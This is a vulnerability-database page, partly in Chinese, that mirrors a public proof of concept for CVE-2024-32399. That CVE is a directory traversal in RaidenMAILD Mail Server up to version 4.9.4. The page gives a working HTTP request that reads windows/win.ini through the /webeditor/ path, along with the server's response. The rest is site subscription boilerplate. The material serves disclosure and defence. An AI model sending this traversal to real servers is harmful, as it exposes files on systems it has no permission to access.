CVE-2024-32399 PoC — RaidenMAILD Mail Server 安全漏洞

来源

https://github.com/NN0b0dy/CVE-2024-32399

关联漏洞

标题:RaidenMAILD Mail Server 安全漏洞 (CVE-2024-32399)
Description:RaidenMAILD Mail Server是RaidenMAILD公司的一款易于使用的 SMTP/POP3/IMAP4/WebMail 邮件服务器。 RaidenMAILD Mail Server v.4.9.4及之前版本存在安全漏洞，该漏洞源于存在目录遍历漏洞。攻击者可利用该漏洞通过/webeditor/组件获取敏感信息。

介绍

# CVE-2024-32399

## Vulnerability Overview
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4
and before allows a remote attacker to obtain sensitive information via
the /webeditor/ component


## Vulnerability Type
Directory Traversal


## Vendor of Product
RaidenMAILD Mail Server


## Affected Version
RaidenMAILD Mail Server <= 4.9.4


## Proof of Concept
Request:
```http
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
```

Response:
```http
HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...
```

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2024-32399 PoC — RaidenMAILD Mail Server 安全漏洞

来源

关联漏洞

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！